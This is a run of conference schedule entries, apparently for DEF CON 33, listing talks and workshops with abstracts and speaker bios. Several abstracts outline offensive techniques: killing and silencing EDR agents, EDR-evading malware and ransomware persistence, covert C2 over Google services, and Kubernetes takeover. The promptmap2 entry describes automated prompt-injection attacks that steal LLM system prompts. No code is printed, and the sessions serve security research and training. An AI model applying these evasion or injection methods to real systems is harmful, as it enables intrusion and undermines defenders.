Utku is a security researcher known for creating open-source security tools including promptmap, urlhunter, and wholeaked. He presented his various research and tools many times at DEF CON and Black Hat conferences. He was also nominated for Pwnie Awards in the Best Backdoor category in 2016. He works for Bank of America as a senior security professional.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 16:00-16:45 PDT


Title: promptmap2
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Promptmap2 is a vulnerability scanning tool that automatically tests prompt injection attacks on your custom LLM applications. It analyzes your LLM system prompts, runs them, and sends attack prompts to them. By checking the response, it can determine if the prompt injection was successful or not. It has ready-to-use rules to steal system prompts or distract the LLM application from its main purpose.

SpeakerBio:  Utku Sen

Utku is a security researcher known for creating open-source security tools including promptmap, urlhunter, and wholeaked. He presented his various research and tools many times at DEF CON and Black Hat conferences. He was also nominated for Pwnie Awards in the Best Backdoor category in 2016. He works for Bank of America as a senior security professional.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Provably exfiltrating data by breaking TLS in the right ways
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N253 - Map

Description:

Join our hands-on workshop to master TLSNotary! Dive into multi-party-TLS (not man-in-the-middle) and learn to prove and verify online data authenticity to a third-party verifier while ensuring privacy. We’ll start with small examples and build up to custom plugins to prove and verify private user data.

Bring your laptop, bring a friend, and learn together. Get ready to unlock and compose web data in innovative ways.

Speakers:AtHeartEngineer,Sinu

SpeakerBio:  AtHeartEngineer, Head of Engineering at Privacy and Scaling Explorations

AtHeartEngineer has been building and breaking things since the 90s, nearly setting his parents’ garage on fire while learning about mains voltage. He previously lead engineering at Privacy and Scaling Explorations, a non-profit focused on building privacy-preserving technologies using programmable cryptography tools like zero-knowledge proofs, and is now exploring what is next.

SpeakerBio:  Sinu, Technical Lead of TLSNotary at Privacy and Scaling Explorations

Sinu is a neutral systems maxi, a cryptography engineer, and the technical lead of TLSNotary.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 13:00-14:59 PDT


Title: Pub Quiz at DEF CON
When: Friday, Aug 8, 13:00 - 14:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

We are back with another Pub Quiz at DEF CON. We had a very successful 2 years hosting this event and we have made some improvements to make it every better. So do you like Pub Quizzes?? If you do then get your butts to join us in participating in the 3rd Pub Quiz at DEF CON 33.

Quiz will consist of 7 rounds question will include 90's/2000's TV and Movies, DEF CON trivia, music, cartoons, and a little sex. The theme for our Pub Quiz will be all things that make DEF CON attendees exceptional. There will be a little something for everyone. The quiz will consist of visual and audio rounds along with some Con questions; we need to make sure we stimulate you peeps. We encourage people to get into teams of 5 or 6.

This is a social event, so we try to get people into Teams. You never know you may meet the love of your life. Did I mention CASH! Yes we will have cold hard cash prizes for the 1st, 2nd, and 3rd high scoring groups. As always if we do have ties will be break those ties with a good old fashion dance off from a person of the tied teams. The hosts and a few goons will help in judging.

Participant Prerequisites

No Prerequisites. Just come to have a good time.

Pre-Qualification

No Pre-Qualifications.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Putting EDRs in Their Place: Killing and Silencing EDR Agents
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N253 - Map

Description:

Many cybercime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!

Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.

Following the building, use, and analysis of readily-available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real-time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next levels? – Let’s do this! And remember: #RansomwareSucks!

Speakers:Ryan "rj_chap" Chapman,Aaron "ironcat" Rosenmund

SpeakerBio:  Ryan "rj_chap" Chapman, Author & Instructor at SANS Institute

Ryan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.

SpeakerBio:  Aaron "ironcat" Rosenmund, Managing Director of Tradecraft and Programs at OnDefend

Aaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.


Return to Index    -    Add to Google    -    ics Calendar file

QTV - Friday - 10:00-10:59 PDT


Title: QC Intro
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall1-W206 - Map

Description:
SpeakerBio:  Sohum Thakkar
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 14:30-14:59 PDT


Title: QRAMM: The Cryptographic Migration to a Post-Quantum World
When: Friday, Aug 8, 14:30 - 14:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

With the NIST standardization of post-quantum cryptography, organizations must prepare to transition from legacy cryptographic systems to quantum-resistant alternatives. Yet the scale and complexity of this migration require more than algorithmic swaps—they demand systemic agility and operational readiness. This talk introduces QRAMM (Quantum Readiness Assurance Maturity Model), an open-source framework co-developed by the speaker, designed to evaluate organizational preparedness across four key dimensions: cryptographic visibility, data protection, technical implementation, and governance. This talk introduces QRAMM’s design and practical applications, highlighting its focus on cryptographic agility as a foundation for adaptive, forward-compatible security planning in the quantum era.

Speakers:Emily Fane,Abdel Sy Fane

SpeakerBio:  Emily Fane, Lead Cryptography Application Engineer at Niobium

Emily Fane is the Lead Cryptography Application Engineer at Niobium, where she focuses on Fully Homomorphic Encryption (FHE), a quantum-secure technique that enables computation on encrypted data. Her background spans quantum machine learning, applied cryptographic research at Allstate, and published work in number theory. She is also the co-founder of CyberSecurity NonProfit (CSNP.org), a global organization dedicated to improving access to cybersecurity education, training, and events. Emily co-developed the open-source Quantum Readiness Assurance Maturity Model (QRAMM), which provides a structured framework for evaluating how prepared an organization is to migrate from classical cryptography to post-quantum alternatives.

SpeakerBio:  Abdel Sy Fane
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

QTV - Saturday - 10:00-11:15 PDT


Title: Quantum Pictorialism for Hackers
When: Saturday, Aug 9, 10:00 - 11:15 PDT
Where: LVCCWest-Level1-Hall1-W206 - Map

Description:
SpeakerBio:  Bob Coecke
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

QTV - Friday - 16:00-17:59 PDT


Title: Quantum Table Top Threat Modelling
When: Friday, Aug 8, 16:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall1-W206 - Map

Description:
SpeakerBio:  Jaya Baloo
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 10:30-10:59 PDT


Title: Quantum-Resistant Healthcare
When: Friday, Aug 8, 10:30 - 10:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Quantum computers are steadily improving, and experts estimate that within the next 30 years, quantum computers will be able to break certain cryptographic algorithms, such as those used to protect against eavesdropping during internet communications. All industries—especially those hosting critical infrastructure like healthcare—need to prepare for this shift and begin transitioning to post-quantum cryptography to ensure quantum resistance. In this talk, we will discuss the quantum threat and use specific examples from Siemens Healthineers’ environment to highlight the key aspects vendors must consider when transitioning to post-quantum cryptography.

SpeakerBio:  Katarina Amrichova, Siemens-Healthineers

Katarina has a deep appreciation for reverse engineering, exploit development and cryptography.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 16:00-17:59 PDT


Title: Queercon Mixer
When: Saturday, Aug 9, 16:00 - 17:59 PDT
Where: LVCCWest-Level3-W325 - Map

Description:

Come meet the largest social network of LGBTQIA+ and allied hackers at Queercon! Our mixers are designed for you to meet, network, and engage with like-minded people to a backdrop of music, dance, and refreshments.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 16:00-17:59 PDT


Title: Queercon Mixer
When: Friday, Aug 8, 16:00 - 17:59 PDT
Where: LVCCWest-Level3-W325 - Map

Description:

Come meet the largest social network of LGBTQIA+ and allied hackers at Queercon! Our mixers are designed for you to meet, network, and engage with like-minded people to a backdrop of music, dance, and refreshments.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 16:30-16:59 PDT


Title: Quiet Confidence: An Introvert's Journey to Technical Public Speaking
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Public speaking is a powerful tool for career growth, thought leadership, and community impact, but for introverts and underrepresented folks in cybersecurity, the stage can feel intimidating. As a woman in cybersecurity, I understand firsthand the challenges we face in getting our voices heard. On average, women only represent 25% of speakers at tech conferences, it's clear that something is holding us back.

This talk will be focused on my personal journey from zero public speaking experience to delivering nine technical talks at international conferences in just one year. I'll share how I built confidence, overcame stage fright, and embraced my unique perspective to share knowledge and inspire others.

In this session, we'll explore the reasons behind women's underrepresentation at tech conferences, and provide practical tips on:

How to manage nervousness and overcome stage fright. Preparing like a pro - build technical talks that resonate with diverse audiences. Turning introverted traits into strength in public speaking

Whether you’re a first-time speaker or a seasoned pro, walk away with actionable tools to find speaking opportunities, craft CFPs and deliver talks that leave a lasting impact.

SpeakerBio:  Emma Fang
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-16:50 PDT


Title: Ransomware vs EDR: Inside the Attacker's Mind
When: Saturday, Aug 9, 11:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 4 - Map

Description:

Can You Really Trust Your EDR? Spoiler: Attackers Don’t — They Exploit It.

In the ever-evolving world of cybersecurity, attackers are one step ahead. But what happens when defenders rely on tools that attackers already know how to bypass? In this session, we dive deep into the mindset of adversaries and explore how modern Endpoint Detection and Response (EDR) systems are not the impenetrable fortress many think they are. As a defense researcher specializing in adversarial behavior, I’ve crafted a cross-platform ransomware (Windows, macOS, Linux) to understand the gaps in current defense mechanisms—not to cause harm, but to reveal how attackers think, act, and effortlessly slip past advanced defenses.

Through a live Proof of Concept (PoC) and in-depth technical walkthroughs, we’ll uncover the persistent techniques, evasion strategies, and overlooked system behaviors that let ransomware thrive even in well-defended environments. This talk isn’t meant to alarm—it’s an honest, reality-driven exploration of how attackers exploit EDRs, and more importantly, how defenders can bolster their security strategies.

If you work in blue team operations, threat hunting, or product security, expect to leave with a series of challenging questions rather than comforting answers.

I. Ransomware: Beyond Encryption

Evolving Objectives: Extortion, Persistence, and Disruption When Persistence is the Key to Success, Not the Payload

II. Mastering Persistence Across Platforms

macOS: LaunchAgents as a Stealthy Tool Windows: Registry Hijacking and Scheduled Tasks Linux: Cron Jobs, the Silent Worker

III. Building the Payload: Python and Java in Offensive Security

Quick Deployment: Why high-level languages dominate the attack surface Modular and Adaptable: Flexibility over complexity for real-world attacks

IV. How EDRs Actually Work: A Deep Dive

Detection Techniques: Behavioral analysis, memory scanning The Silent Failures: Weak telemetry collection and blind spots Evasion Patterns: From PoCs to real-world attacks

V. EDR Bypass: Simple Yet Effective Techniques

Signature Evasion: Breaking through with minor tweaks Demonstration: How different commercial EDRs can be bypassed effortlessly

VI. Theory Meets Reality: Lessons Learned from PoCs

Real-World PoCs: Demonstrating how defenses fail against basic, effective tactics Undetected Persistence: How attackers use legitimate tools and strategies to evade detection, even in heavily secured environments The Gap: Why static detection and behavioral analysis don’t always mesh—and how attackers exploit this vulnerability

VII. Final Thoughts: Turning Offensive Knowledge into Defensive Strength

Adopting the Attacker’s Perspective: Understanding offensive techniques to fortify defenses Realism Over Optimism: Building adaptable, resilient security strategies with limited resources A Call to Action: Defend with pragmatism—recognize the attackers’ mindset to create proactive defenses

SpeakerBio:  Zoziel Freire

I have been working with Information Technology for over 16 years. I worked for a long time as a consultant, providing services to several companies in different segments in Brazil and other countries.

During my career, I acquired vast experience in Incident Response, Forensic Analysis, Threat Hunting, Malware Analysis and Malicious Document Analysis. I worked sharing knowledge as OWASP Chapter Leader - Vitória.

I have some certifications in Information Security. I am passionate about malware development and analysis and forensic investigation.

I have worked with Ransomware Incidents in Brazil and other countries. I am a speaker at events on Hacking and Information Security, Malware Analysis and Information Security Awareness.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:00-14:20 PDT


Title: RATs & Socks abusing Google Services
When: Saturday, Aug 9, 14:00 - 14:20 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

This talk revisits Google Calendar RAT (GCR), a proof-of-concept released in 2023 by the speaker, demonstrating how Google Calendar can be abused for stealthy Command&Control (C2) communication. A similar technique was recently observed in the wild, used by the APT41 threat group during a real-world campaign, which highlights the growing interest in abusing trusted cloud services for covert operations.

Building on that concept, the talk introduces a new Golang-based tool that enables SOCKS tunneling over Google services, establishing covert data channels.

The session explores how common cloud platforms can be repurposed to support discreet traffic forwarding and evade traditional network monitoring. While some familiarity with tunneling and cloud services may be helpful, the talk is designed to be accessible and will walk attendees through all key concepts.

Whether you're a penetration tester, red teamer, or simply curious about creative abuse of cloud infrastructure, you’ll leave with fresh ideas and practical insights.

References:

SpeakerBio:  Valerio "MrSaighnal" Alessandroni

Valerio "MrSaighnal" Alessandroni is a seasoned offensive security professional with a lifelong passion for hacking. A former member of the Italian Army’s cyber units, he now leads EY Italy’s Offensive Security team, focusing on advanced red teaming and threat emulation.

He’s behind open-source tools like Google Calendar RAT (GCR) and he holds certifications including OSCP, OSEP, OSWE, OSWP, CRTO, eWPTX, eCPTX and more.

His bug bounty research has earned recognition from Microsoft, NASA, Harvard, and others. Off the keyboard, he rolls on the mat in Brazilian Jiu Jitsu and dreams of space exploration.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 12:00-12:59 PDT


Title: Rayhunter Internals
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C102 - Map

Description:

Rayhunter is an open source project from EFF to detect IMSI catchers. In this follow up to our main stage talk about the project we will take a deep dive into the internals of Rayhunter. We will talk about the architecture of the project, what we have gained by using Rust, porting to other devices, how to jailbreak new devices, the design of our detection heuristics, open source shenanigans, and how we analyze files sent to us. It's everything you didn't know you wanted to know about Rayhunter.

Speakers:oopsbagel,Cooper "CyberTiger" Quintin

SpeakerBio:  oopsbagel

oopsbagel is not a bagel but may be eating one while you read this. oops loves contributing to open source software, running wireshark, reversing, hardware hacking, breaking Kubernetes, and floaking.

SpeakerBio:  Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFF

Cooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.

Cooper has many years of security research experience on tools of surveillance used by government agencies.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Reach the Nirvana
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N258 - Map

Description:

The Nirvana Debug is a Windows internal features existing since Windows 7. This workshop idea is to see how this feature can be weaponized in order to either: - Hijack execution flow - Perform process injection - Perform sleep obfuscation for C2 beacon

During this workshop, you will learn the main principle of Nirvana Debugging, and try to weaponize it. Some debugging, reverse and coding will be needed in order to create a new malware that will evade classic EDR solutions.

WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP

SpeakerBio:  Yoann "OtterHacker" DEQUEKER, RedTeam Leader at Wavestonee

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.

His research leads him to present his results on several conferences such as LeHack (Paris), Insomni'hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:00-14:45 PDT


Title: Rebadged, Relabeled, and Rooted: Pwnage via the Solar Supply Chain
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Residential solar promises energy independence, but behind the panels lies a chaotic mess of insecure firmware, exposed APIs, and rebadged devices phoning home to mystery servers. This talk exposes how today's solar microgrids can be hijacked through unauthenticated cloud APIs, unsigned firmware updates, hardcoded root credentials, and even vendor-enabled kill switches. No custom exploits. No insider access. Just publicly documented APIs, leaked serial numbers, and a shocking lack of basic security controls.

We will walk through real-world attacks, account takeover via brute-forced PINs, remote access to power dashboards with zero authentication, firmware tampering for persistent implants, and replay attacks against plaintext MODBUS traffic. Our research reveals how vulnerabilities silently propagate across cloned OEMs and shared cloud infrastructure, turning a single bug into an industry-wide risk. If you thought solar made you off-grid, this talk will change your threat model.

References:

Speakers:Anthony "Coin" Rose,Jake "Hubble" Krasnov

SpeakerBio:  Anthony "Coin" Rose, Director of Security Research and Chief Operating Officer at BC Security

Dr. Anthony "Coin" Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.

SpeakerBio:  Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security

Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 13:00-13:59 PDT


Title: Rebuild The World: Access to secure software dependency management everywhere with Nix
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

In a world full of unwanted app updates and SaaS providers who want your personal information, being able to self host the 120,000 Linux packages in Nixpkgs has the potential to change the game for anyone who's tired of the slow decline of cloud services. If you're curious about what NixOS can do for your homelab, or even if you're just worried about SBOMs or traceability of exactly where your software and all its dependencies came from, join us for an hour-long panel about how we can reclaim our services and software from vendor lockin and Docker image bitrot using Nix and NixOS. We'll be doing a deep dive into why Nix changes software deployment, and how you can get started and get involved in the quiet revolution that has been reshaping how we use software.

Speakers:Tom Berek,Farid Zakaria,Daniel Baker

SpeakerBio:  Tom Berek, Lead Engineer at Flox

Life-long engineer. Worked at Google, flew jet planes in the Marine Corps, trained cyberware teams, formed and led teams to perform rapid hardware and software capability development, worked with the Digital Service to bring modern software practices to the DoD and government. Left the service to create a contracting startup bringing AI/ML products to DoD. Throughout have found a consistent set of challenges in the course of development; also found a set of superpowers to address those challenges using Nix. After several iterations of applying the Nix ecosystem in various teams, the difference was stark. This led to the desire to bring this set of superpowers to the rest of the world and make it more adoptable; hence the involvement in the Nix community as a maintainer, founding Flox, and leading efforts to improve user experience and communicate it to the world.

SpeakerBio:  Farid Zakaria, Principal Engineer at Confluent

I am a software engineer, father, and wishful surfer. I currently work at Confluent on developer productivity and recently defended a Ph.D. in computer science at the University of California Santa Cruz. More relevant to Nix, I am a NixOS enthusiast, which has led me to rethink basic Linux primitives.

SpeakerBio:  Daniel Baker, Software Engineer at Anduril

I am an engineer, mathematician, developer, and Linux enjoyer. I primarly support the NixOS project as part of the Marketing Team. I believe that the future of software development and software deployment needs foundations in formal methods and functional programming to be successful.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 13:30-14:15 PDT


Title: Recording PCAPs from Stingrays With a $20 Hotspot
When: Friday, Aug 8, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

What if you could use Wireshark on the connection between your cellphone and the tower it's connected to?

In this talk we present Rayhunter, a cell site simulator detector built on top of a cheap cellular hotspot. It works by collecting and analyzing real-time control plane traffic between a cellular modem and the base station it's connected to. We will outline the hardware and the software developed to get low level information from the Qualcomm DIAG protocol, as well as go on a deep dive into the methods we think are used by modern cell-site simulators. We’ll present independently validated results from tests of our device in a simulated attack environment and real world scenarios. Finally, we will discuss how we hope to put this device into the hands of journalists, researchers, and human rights defenders around the world to answer the question: how often are we being spied on by cell site simulators?

References:

Speakers:Cooper "CyberTiger" Quintin,oopsbagel

SpeakerBio:  Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFF

Cooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.

Cooper has many years of security research experience on tools of surveillance used by government agencies.

SpeakerBio:  oopsbagel

oopsbagel is not a bagel but may be eating one while you read this. oops loves contributing to open source software, running wireshark, reversing, hardware hacking, breaking Kubernetes, and floaking.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Sunday - 12:30-12:59 PDT


Title: Red Alerts and Blue Oceans: Incident Response from a Sysadmin’s War Room in Maritime Ops
When: Sunday, Aug 10, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Cyber Security threats encountered in the Maritime Industry from both an Executive and Technical Perspective. The presentation is based on current events and starts with the Executive Director of The Marine Exchange of Southern California giving his side of the story followed by the technical and first-hand incident response breakdown from the Senior Systems Administrator.

Speakers:Capt. Kit Louttit,Steve Winston

SpeakerBio:  Capt. Kit Louttit, Marine Exchange of Southern California

Captain Kip Louttit was appointed as the Executive Director of the Marine Exchange of Southern California in January 2013. A graduate of the United States Coast Guard Academy, he served in the United States Coast Guard (USCG) for 30 years prior to retiring with the rank of Captain. Captain Louttit’s experience includes 10 years at sea in the Atlantic and Pacific Oceans and the Bering, Mediterranean, and Caribbean Seas. He had six years in command of three different Coast Guard cutters and two years as commanding officer of USCG Integrated Support Command in San Pedro. Following retirement from the Coast Guard, Captain Louttit worked for two consulting firms on Coast Guard and Pentagon work.

SpeakerBio:  Steve Winston, Mastermind MSP

Senior Systems Administrator and CASP-certified cybersecurity professional with over 9 years of experience supporting a broad spectrum of IT environments. Has worked with more than 30 organizations across finance, healthcare, manufacturing, and critical infrastructure, bringing a practitioner’s perspective to enterprise defense. Specializes in securing hybrid infrastructures, implementing proactive threat mitigation strategies, and translating complex security requirements into operationally sound solutions. Combines deep systems knowledge with an adversarial mindset to challenge assumptions and close real-world security gaps.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Sunday - 11:00-11:30 PDT


Title: Red Russians: How Russian APT groups closely follow offensive security research
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Offensive security is meant to improve defenses, but what happens when hostile nation-states start learning from us too? This talk explores how Russian intelligence services and advanced persistent threat (APT) groups have adopted and adapted techniques developed by Red Teamers, sometimes within weeks of public disclosure. These campaigns involve taking newly disclosed exploits, tools, and tricks to exploit modern enterprise systems, such as Microsoft 365 services, Windows features, software development systems, authentication systems, and cloud infrastructure. Throughout the talk, detection engineering and threat hunting tips shall be provided to offer attendees a technique for detecting and preventing these types of attacks.

For Red Teamers, this talks is a wake-up call: the same tools and tradecraft used to test enterprise security are increasingly turning up in real-world espionage campaigns, sometimes targeting the very governments and public services we rely on. For Blue Teamers, this talk is a reminder to pay close attention to the cutting edge of offensive tooling.

SpeakerBio:  Will Thomas, Senior Threat Intel Advisor at Team Cymru

Currently working as a Senior Threat Intel Advisor at Team Cymru. Previously I was a CTI Researcher and Threat Hunter at the Equinix Threat Analysis Center (ETAC). Prior to this, I worked for Cyjax, a UK-based CTI vendor. My other main commitment is as the co-author of the SANS FOR589: Cybercrime Intelligence course. I have also volunteered my spare time to being the co-founder and main organiser of the Curated Intelligence trust group and Bournemouth 2600.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 12:00-13:50 PDT


Title: Red Teaming Financial Defenses
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

This workshop flips the script on financial security, focusing on a practical, hands-on level where attendees will learn by doing. Attendees will step into the shoes of sophisticated attackers targeting the interconnected financial ecosystem. Guided by us - Chloe, with experience in architecting B2B fraud solutions for acquiring banks in Singapore, and Weihong, with hands-on experience building ML-based KYC/liveness detection and rule-based risk systems for new user onboarding at OKX (a crypto exchange) - participants will learn how to think offensively.

Speakers:Wei Hong,Chloe Chong

SpeakerBio:  Wei Hong

Wei Hong is a machine learning practitioner with six years of experience in natural language processing and applied AI at one of the world’s largest cryptocurrency exchanges. He has contributed to projects involving KYC systems, user risk profiling, and the deployment of AI in real-world financial applications. Fascinated by blockchain development, Wei Hong is particularly interested in the intersection of decentralization, transparency, and machine learning. He is currently pursuing a Master’s in Computer Science at Georgia Tech, where he is an active member of the Blockchain Club@GT.

SpeakerBio:  Chloe Chong

Chloe is a machine learning engineer and blockchain enthusiast with five years of experience in building ML systems for fraud detection and compliance in the traditional payments and fintech industry. Outside of work, she explores blockchain development with a focus on usability and real-world applications in the payment space. Chloe is an active member of the Georgia Tech Blockchain Club and is particularly interested in how decentralized technologies can improve financial infrastructure and user experience.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 13:00-13:50 PDT


Title: Red Teaming Kubernetes: From App-Level CVEs to Full Cluster Takeover
When: Friday, Aug 8, 13:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

Kubernetes is the de facto operating system of the cloud, and more and more organizations are running their workloads on Kubernetes. While Kubernetes offers many benefits, it also introduces new security risks, such as cluster misconfiguration, leaked credentials, cryptojacking, container escapes, and vulnerable clusters.

In this workshop, attendees will learn how to attack Kubernetes clusters by simulating a real-world adversary exploiting one of the most recent vulnerabilities in the ecosystem: IngressNightmare (CVE-2025-1974). Participants will practice exfiltrating service account tokens and credentials, performing lateral movement, escalating privileges by targeting common applications deployed in Kubernetes environments, and ultimately compromising the entire cluster.

SpeakerBio:  Lenin Alevski

Lenin Alevski is a Full Stack Engineer and generalist with a lot of passion for Information Security. Currently working as a Security Engineer at Google. Lenin specializes in building and maintaining Distributed Systems, Application Security and Cloud Security in general. Lenin loves to play CTFs, contributing to open-source and writing about security and privacy on his personal blog https://www.alevsk.com.


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Saturday - 14:00-14:30 PDT


Title: Red Teaming Space: Hacking the Final Frontier
When: Saturday, Aug 9, 14:00 - 14:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

The new space race is here and as space systems become more interconnected and commercially accessible, their attack surface expands, making them prime targets for cyber threats. Yet, most organizations developing and operating satellites rely on traditional security models, if at all, that do not account for the unique risks of space-based assets. This talk explores the emerging discipline of space red teaming, where offensive security techniques are applied to test and validate the security of satellites, ground stations, and their supporting infrastructure.

In this talk we explore the following:

Understanding the space attack surface: - A breakdown of key vulnerabilities in spacecraft, radio links, and ground control. - Tactics, Techniques, and Procedures (TTPs): How attackers might compromise a space asset, disrupt communications, or manipulate telemetry. - Defensive takeaways: How space operators can leverage red teaming to harden their architectures against real-world threats.

This presentation is ideal for penetration testers, security researchers, space engineers, and policy makers who want to understand the offensive side of space security. Whether you’re an experienced red teamer or just a space junky, this talk will provide practical insights into securing the next frontier.

SpeakerBio:  Tim Fowler, ETHSO Labs
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-16:50 PDT


Title: Redteam Infrastructure Vibez Edition
When: Saturday, Aug 9, 15:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

In this session we will showcase how you can leverage AI to build your terraform packages for your Red Team Workshop. Make sure to bring your laptops!

SpeakerBio:  Moses Frost

Moses Frost has been working in the field since the late 90's. Working with computers in the late 80s for fun and moving into a more professional field shortly after high school. He is a Red Team Operator at Neuvik. A senior instructor and course author at the SANS Institute, authoring and teaching the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.


